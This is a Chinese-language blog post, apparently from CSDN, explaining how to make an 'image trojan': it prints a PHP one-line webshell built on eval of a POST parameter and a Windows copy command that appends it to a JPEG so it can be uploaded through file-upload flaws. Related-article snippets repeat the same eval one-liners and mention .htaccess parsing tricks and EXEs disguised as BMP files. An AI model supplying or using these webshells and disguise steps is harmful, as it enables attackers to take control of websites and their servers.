木马制作——图片木马制作

最新推荐文章于 2024-07-28 22:23:00 发布
最新推荐文章于 2024-07-28 22:23:00 发布
阅读量1.1w 收藏 62
点赞数 8
文章标签: 编辑器 安全 经验分享 http windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339082/article/details/117751003
版权

木马制作——图片木马制作

一、简单说明

图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。

二、制作方式

  1. 利用windows 命令
    准备一个木马,以php一句话为例,文件名为pass.php,内容如下:
<?php
@eval($_POST['pass']);
?>
  1. 准备一张图片,文件名为555.jpeg,然后在文件的目录下cmd,使用命令:
copy 555.jpeg/b+pass.php/a muma.jpeg

命令与参数说明:
copy:将文件复制或者是合并,/b的意思是以前边图片二进制格式为主,进行合并,合并后的文件依旧是二进制文件,实用于图像/声音等二进制文件。/a的意思是指定以ASCII格式复制,合并文件。用于jpeg等文本类型文档。
在这里插入图片描述
在这里插入图片描述
生成了一张图片木马,文件名为muma.jpeg。
在这里插入图片描述
比较555.jpeg与muma.jpeg的区别。
在这里插入图片描述
当然,也可以用一些小工具来生成,如:edjpgcom.exe。

weixin_50339082
关注
  • 8
    点赞
  • 62
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
图片木马制作的三种方法
afei001
02-08 1311
目录 1.图片木马简介 2.制作图片木马的三种方法 3.copy命令制作 4.photoshop制作 5.UltraEdit制作 6.总结 1.图片木马简介 图片木马,顾名思义就是包含可执行木马的图片。通过一定的手段将一句话木马等程序加入到图片中,再将该木马图片上传到网站,从而达到控制整个网站目的。 2.制作图片木马的三种方法 (1)copy命令制作; (2)photoshop插入制作; (3)二进制编辑器制作(比如:winhex、ultraEdit)...
制作图片木马教程
zhdd1234的专栏
09-15 2241
 何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行。  然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件
做一个图片马(图片木马)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码
最新发布
qq_48368964的博客
07-28 802
图片马:就是在图片中隐藏一句话木马。利用.htaccess等。
图片木马制作
qq_46277212的博客
06-27 712
1.一张图片,jpg格式 1.jpg 2.一句话木马 2.asp <?php eval requset ("value");?> 3.cmd: copy 1.jpg/b+1.asp/a 2.jpg 使用Notepad++打开可发现,在jpg文件底部有着木马代码
图片木马制作方法详细教程
爱吃仡坨的Blog
10-24 9526
将写的木马插入到图片中,之后配合解析漏洞.htaccess等,对图片马进行解析,从而执行图片中的恶意代码;# 因此 服务器是对文件后缀来对文件进行解析的,所以我们可以通过修改文件后缀来对图片进行访问。此时生成的是图片文件,我们将后缀改为zip时,任然可以读取压缩包文件中的内容。先将一张图片放到PS中,之后点击左上角文件——>文件简介。通过十六进制编辑器,将一句话木马写入图片中。通过图片隐藏信息,是一个合成的过程。最后将带有一句话木马的图片导出。图片越小的文件,制作工艺越纯良。把压缩包放到图片中,进行合成。
图片木马
JackLiu16的博客
03-01 3295
导读:图片木马制作改名XXXXX.JPG.EXE,加壳。制造和等待执行机会上传图片的目录,虽然没有执行权限。但也还不是好的解决方案。更好的方案仍在探索自学了一个晚上的木马原理和制作,发现这个小东西越来越对我的胃口,很小的一个程序却能让人琢磨很久。    木马归根结底就是一个EXE可执行文件,根据目的不同可以达到各种效果,比如偷QQ,删除文件,破坏系统等等,功能强大哈!    偷QQ的小木马制作非常...
入狱小技巧之木马制作——图片木马制作
qq_33168924的博客
09-07 7689
0x01 图片木马制作 0x02 简单说明 图片木马指的是图片格式的文件木马,图片格式包括jpg,png等,原理是将木马程序和图片捆绑在一起,达到伪装的目的,程序可以是脚本语言或者编译语言,在web渗透中,通常将脚本编写的webshell和图片合成一个新的木马,结合web的文件上传漏洞进行利用,获取网站应用的webshell权限。 0x03 制作方式 A) 利用windows 命令 准备一个木马,以php一句话为例,文件名为pass.php,内容如下: <?php @eval($_POST['pass
Kali Linux渗透测试小实践——Metasploit与后门木马
PICACHU+++的博客
01-08 2840
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
创意外观制作辅导策略——以广东省创意机器人大赛为例.pdf
08-12
【创意外观制作辅导策略】是针对中小学生科技竞赛中的一项关键环节,尤其在广东省创意机器人大赛这样的赛事中,作品的创新性和视觉吸引力至关重要。本文主要讲述了如何指导学生提升创意外观的设计和制作能力。 首先...
php检测图片木马多进制编程实践
01-20
其实一开始我什么也不知道,只是后来在网上查了一些资料,找到的全是有制作图片木马的教程,并没有找到检测的程序。 经过几番思索之后,决定从制作原理来分析这种木马程序。这种木马程序是十六进制编码写的,我灵机...
图片绑定木马.doc
09-07
关于木马如何嵌套到图片中, 讲述了其中的原理,然后操作方法。相信大家看了之后不少帮助!
木马终端】————1、中国蚁剑的使用与功能介绍
热门推荐
Fly_鹏程万里
08-08 1万+
前言 说起webshell终端管理工具大多数人都会说“中国菜刀”,确实“中国菜刀”伴随着我们一起在网络安全道路上走了好久好久,它算的上是webshell终端管理工具的“启蒙导师”。今天给大家要介绍的是一个功能更加强大而且好用的webshell终端管理工具——中国蚁剑。 下载 中国蚁剑的项目地址:https://github.com/AntSwordProject/antSword ...
一个简单的键盘监听木马dawenxi的制作
qq_48637067的博客
12-25 2146
事实上,我最初是没想到这学期的物联网安全课程会以答辩形式作为考核的,更没想到的是老师竟然让我们自己设计一个针对物联网的病毒或者针对物联网的漏洞,还要求不能被查杀。这难度,属实大?_? 。可是,我不想挂科啊,就只能硬着头皮来了。 我害怕答辩时会出现功能相似的作品,就没有考虑wifi安全、U盘安全、路由器安全等(果然,答辩的时候一堆这几方面的作品,现在想想,还是后怕,哈哈)。灵感来自于之前上的一门《逆向工程》,在这门课的配套书上,我看到过记录键盘的木马程序。键盘可以说是我们最常用的硬件了,所以键盘的安全问题也就
vue使用icon
weixin_43755104的博客
08-20 259
文章目录第一步第二步第三步 inde.html引入 场景描述 我想给浏览器上加个icon图标样, 例如下图 第一步 首先准备一张图片 然后去比特虫网站制作icon图标 第二步 static导入图片 第三步 inde.html引入 <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,initial-scale=1.0"> <link rel
简单图片木马的生成与利用
Deeeelete的博客
02-08 1万+
首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;进入 3.在cmd中输入 c...
如何使用kali的msf制作木马
06-10
我很抱歉,我不能回答如何使用Kali的Metasploit Framework(MSF)制作木马的问题,因为这涉及到违法和不道德的行为。MSF是一个用于漏洞测试和渗透测试的工具,但其目的是帮助安全专业人员和网络管理员保护网络安全,而不是破坏网络安全。在任何情况下,不要试图使用Kali或任何其他工具来制作或传播恶意软件,否则你可能会面临法律责任。请遵守相关法规和道德规范,使用工具来促进网络安全
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值